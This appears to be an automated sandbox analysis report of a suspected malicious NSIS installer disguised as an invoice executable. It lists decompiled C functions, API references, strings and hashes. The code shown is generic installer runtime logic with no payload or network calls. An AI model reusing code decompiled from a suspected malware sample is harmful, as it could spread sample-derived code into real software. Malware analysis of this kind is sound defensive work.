Opcode ID: 575aa24b2d098a28b27e847770fdd4be0d13f9e94d9c42d0da02910fc49695c5
Instruction ID: 2d600006130e1353e9717e04d579c0b21937dc8f48943746337f7f8a87e4f386
Opcode Fuzzy Hash: 575aa24b2d098a28b27e847770fdd4be0d13f9e94d9c42d0da02910fc49695c5
Instruction Fuzzy Hash: 5711B7B760412427DB00667D9C45EAF3298DB85378F250237FA66F71D2E978CC2242A9

Uniqueness

Uniqueness Score: -1.00%

Function 00405B5A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405B5A(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060D4(0x7a0970, _a4);
				_t21 = E00405B05(0x7a0970);
				if(_t21 != 0) {
					E004063AF(_t21);
					if(( *0x7a2f7c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x7a0970;
						while(1) {
							_t11 = lstrlenA(0x7a0970);
							_push(0x7a0970);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406448();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AB3(0x7a0970);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A6C();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405b66
0x00405b71
0x00405b75
0x00405b7c
0x00405b88
0x00405b94
0x00405b94
0x00405bac
0x00405bad
0x00405bb4
0x00405bb5
0x00000000
0x00000000
0x00405b98
0x00405b9f
0x00405ba7
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b9f
0x00405bb7
0x00000000
0x00405bcb
0x00405b8a
0x00405b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b8e
0x00405b77
0x00000000

APIs

Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,007A2760,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1

Part of subcall function 00405B05: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb112C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BAD
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BBD

Strings

C:\Users\user\AppData\Local\Temp\nsb112C.tmp, xrefs: 00405B60, 00405B65, 00405B6B, 00405BA6, 00405BAC, 00405BB4, 00405BBC
C:\Users\user\AppData\Local\Temp\, xrefs: 00405B5A

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb112C.tmp
API String ID: 3248276644-43596561
Opcode ID: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
Instruction ID: 7cbc09aec6071699a8b6d0bfe618f446c080df756954f9e0a70e7bdf69c0a73f
Opcode Fuzzy Hash: 4efc29256ecc737a82cedd05a7c6237be84f99c24c6a7e1b03480747464f6d67
Instruction Fuzzy Hash: A6F0C825105D5516C622623A0C05E9F3A64CE8732871A063FF8A1B12D3DF3CB9439D6E

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A6C(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405a6d
0x00405a84
0x00405a8c
0x00405a8c
0x00405a94

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A72
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403312,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00405A7B
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405A8C

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A6C

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 34bed66953ae9f6d257ce18580ddfb03ef3f992d07e6ea95338c5d753b7bd418
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 47D0A7622456307BD20167154C05ECB19088F063047054036F541B2192C73C4C1187FD

Uniqueness

Uniqueness Score: -1.00%

Function 00405B05, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B05(CHAR* _a4) {
				CHAR* _t5;
				char* _t7;
				CHAR* _t9;
				char _t10;
				CHAR* _t11;
				void* _t13;

				_t11 = _a4;
				_t9 = CharNextA(_t11);
				_t5 = CharNextA(_t9);
				_t10 =  *_t11;
				if(_t10 == 0 ||  *_t9 != 0x3a || _t9[1] != 0x5c) {
					if(_t10 != 0x5c || _t11[1] != _t10) {
						L10:
						return 0;
					} else {
						_t13 = 2;
						while(1) {
							_t13 = _t13 - 1;
							_t7 = E00405A97(_t5, 0x5c);
							if( *_t7 == 0) {
								goto L10;
							}
							_t5 = _t7 + 1;
							if(_t13 != 0) {
								continue;
							}
							return _t5;
						}
						goto L10;
					}
				} else {
					return CharNextA(_t5);
				}
			}

0x00405b0e
0x00405b15
0x00405b18
0x00405b1a
0x00405b1e
0x00405b33
0x00405b52
0x00000000
0x00405b3a
0x00405b3c
0x00405b3d
0x00405b40
0x00405b41
0x00405b49
0x00000000
0x00000000
0x00405b4b
0x00405b4e
0x00000000
0x00000000
0x00000000
0x00405b4e
0x00000000
0x00405b3d
0x00405b2b
0x00000000
0x00405b2c

APIs

CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
CharNextA.USER32(00000000), ref: 00405B18
CharNextA.USER32(00000000), ref: 00405B2C

Strings

C:\Users\user\AppData\Local\Temp\nsb112C.tmp, xrefs: 00405B06

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsb112C.tmp
API String ID: 3213498283-995190758
Opcode ID: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
Instruction ID: 64857a031f8c29d5ad2cb6748f8602f3023039c2fddfbd8d295625c88611b6e1
Opcode Fuzzy Hash: 1e979eba324918ca677e02d4c6d61fe282ba8a8b0f982e42ab73b577f73820d9
Instruction Fuzzy Hash: 90F0C251905F646AFF2266640C54B67ABA8CF56350F18407BD280B72C2C27878448FAA

Uniqueness

Uniqueness Score: -1.00%

Function 00402E3D, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x79e120 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x7a2f70) {
							_t3 = CreateDialogParamA( *0x7a2f60, 0x6f, 0, E00402DBA, 0);
							 *0x79e120 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406519(0);
					}
				} else {
					_t6 =  *0x79e120;
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x79e120 = 0;
					return _t6;
				}
			}

0x00402e44
0x00402e64
0x00402e6e
0x00402e7a
0x00402e8b
0x00402e94
0x00000000
0x00402e99
0x00402ea0
0x00402e66
0x00402e6d
0x00402e6d
0x00402e46
0x00402e46
0x00402e4d
0x00402e50
0x00402e50
0x00402e56
0x00402e5d
0x00402e5d

APIs

DestroyWindow.USER32(?,00000000,0040301B,00000001), ref: 00402E50
GetTickCount.KERNEL32 ref: 00402E6E
CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
ShowWindow.USER32(00000000,00000005), ref: 00402E99

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
Instruction ID: 07a7c2fcb6e55b04e3e3d34d53389a9772e5beadce82dbb6bf9e24f56b5acc78
Opcode Fuzzy Hash: 2c4addb43d5c00204abaef2ddcbdcde683c8282d51b9ea1b9effed1c6012b8ed
Instruction Fuzzy Hash: 91F05E30481624EFC621AB64FE0CA9B7B64BB44B41711893FF085B12F8C77808828BDC

Uniqueness

Uniqueness Score: -1.00%

Function 0040516F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040516F(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x79f554 != _t16) {
							_push(_t16);
							_push(6);
							 *0x79f554 = _t16;
							E00404B2B();
						}
						L11:
						return CallWindowProcA( *0x79f55c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404AAB(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004041A4(0x413);
				return 0;
			}

0x00405173
0x0040517d
0x00405199
0x004051bb
0x004051be
0x004051c4
0x004051ce
0x004051cf
0x004051d1
0x004051d7
0x004051d7
0x004051e1
0x00000000
0x004051ef
0x004051a6
0x004051de
0x004051de
0x00000000
0x004051de
0x004051b2
0x004051b4
0x00000000
0x004051b4
0x00405183
0x00000000
0x00000000
0x0040518a
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040519E
CallWindowProcA.USER32 ref: 004051EF

Part of subcall function 004041A4: SendMessageA.USER32 ref: 004041B6

Strings

, xrefs: 0040517F

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
Instruction ID: a815c8626c5111ac64f0cf4f46d81bc36f874ce80d1ab61a55fc5c00676d5aef
Opcode Fuzzy Hash: 34aba529733e3b32ef5863def0a598af0a9d68f7816d72c254ac1b8fca419f55
Instruction Fuzzy Hash: 1A015E31600608ABEF205F11DD84B9B376AEB84315F244137FA00791D0C7799D62DA69

Uniqueness

Uniqueness Score: -1.00%

Function 00405773, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405773(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a0d70->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a0d70,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040577c
0x0040579c
0x004057a4
0x004057a9
0x00000000
0x004057af
0x004057b3

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
CloseHandle.KERNEL32(?), ref: 004057A9

Strings

Error launching installer, xrefs: 00405786

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
Instruction ID: 33f777635f039691b801aef677aa15ec1976f60057d2e453273d56c3b7e761be
Opcode Fuzzy Hash: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
Instruction Fuzzy Hash: 58E04FF5600209BFEB009BA0DD09F7B7BACEB04304F008520BD40F2190D774A8148E78

Uniqueness

Uniqueness Score: -1.00%

Function 00403852, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403852() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79e52c;
				_t3 = E00403837(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79e52c =  *0x79e52c & 0x00000000;
				return _t3;
			}

0x00403853
0x0040385b
0x00403862
0x00403865
0x00403865
0x00403867
0x0040386c
0x00403873
0x00403879
0x0040387d
0x0040387e
0x00403886

APIs

FreeLibrary.KERNEL32(?,73BCFA90,00000000,C:\Users\user\AppData\Local\Temp\,0040382A,00403644,?,?,00000007,00000009,0000000B), ref: 0040386C
GlobalFree.KERNEL32 ref: 00403873

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403852

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
Instruction ID: a47bf4f3c2a96a327e4b4819c0cefa3b0cf6e53b08830cce55d404a8342abc97
Opcode Fuzzy Hash: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
Instruction Fuzzy Hash: 22E01D3350112057C6616F55EE0475977AD5F49B26F06806BF880773514774AC534FDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405AB3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AB3(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405ab4
0x00405abe
0x00405ac0
0x00405ac7
0x00405acf
0x00000000
0x00000000
0x00000000
0x00405acf
0x00405ad1
0x00405ad6

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405AB9
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405AC7

Strings

C:\Users\user\Desktop, xrefs: 00405AB3

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: b470c799eb173815a0b66f2a5ec0288490d136ddbfbfb3d8272f9cf217b16711
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: C5D0A7635089706FE303A2108C44B9F6A48DF17300F1D4462F081A2191C6784C428BFD

Uniqueness

Uniqueness Score: -1.00%

Function 72AB10E0, Relevance: 5.1, APIs: 4, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72AB10E0(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x72ab405c = _a8;
				 *0x72ab4060 = _a16;
				 *0x72ab4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x72ab4038, E72AB1556, _t52);
				_t43 =  *0x72ab405c +  *0x72ab405c * 4 << 2;
				_t17 = E72AB123B();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E72AB1266(E72AB12AD( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E72AB12D1( *_t55 - 0x30, E72AB123B());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x72ab4030;
								 *0x72ab4030 = _t31;
								E72AB1508(_t31 + 4,  *0x72ab4064, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x72ab4030;
							if( *0x72ab4030 != 0) {
								E72AB1508( *0x72ab4064, _t34 + 4, _t43);
								_t37 =  *0x72ab4030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x72ab4030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}

0x72ab10e7
0x72ab10ef
0x72ab1103
0x72ab110b
0x72ab1116
0x72ab1119
0x72ab1121
0x72ab1124
0x72ab1126
0x72ab11c4
0x72ab11d0
0x72ab112c
0x72ab112d
0x72ab112d
0x72ab1130
0x72ab1131
0x72ab1134
0x72ab1203
0x72ab1206
0x72ab119e
0x72ab11a4
0x72ab11ac
0x72ab11b1
0x72ab11b4
0x00000000
0x72ab11b4
0x72ab1209
0x72ab120a
0x72ab1186
0x72ab118c
0x72ab1194
0x00000000
0x72ab1194
0x72ab1152
0x72ab1153
0x72ab115b
0x72ab1168
0x72ab1170
0x72ab1179
0x72ab117e
0x72ab117e
0x00000000
0x72ab1153
0x72ab113a
0x72ab11d1
0x72ab11d1
0x72ab11d8
0x72ab11e5
0x72ab11ea
0x72ab11ef
0x72ab11f5
0x72ab11fb
0x72ab11fb
0x00000000
0x72ab11d8
0x72ab1140
0x72ab1143
0x00000000
0x00000000
0x72ab1149
0x72ab114c
0x72ab119b
0x00000000
0x72ab119b
0x72ab114f
0x72ab1150
0x72ab1183
0x00000000
0x72ab1183
0x00000000
0x72ab11ba
0x72ab11ba
0x00000000
0x72ab11c3

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 72AB115B
GlobalFree.KERNEL32 ref: 72AB11B4
GlobalFree.KERNEL32 ref: 72AB11C7
GlobalFree.KERNEL32 ref: 72AB11F5

Memory Dump Source

Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true

Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID:
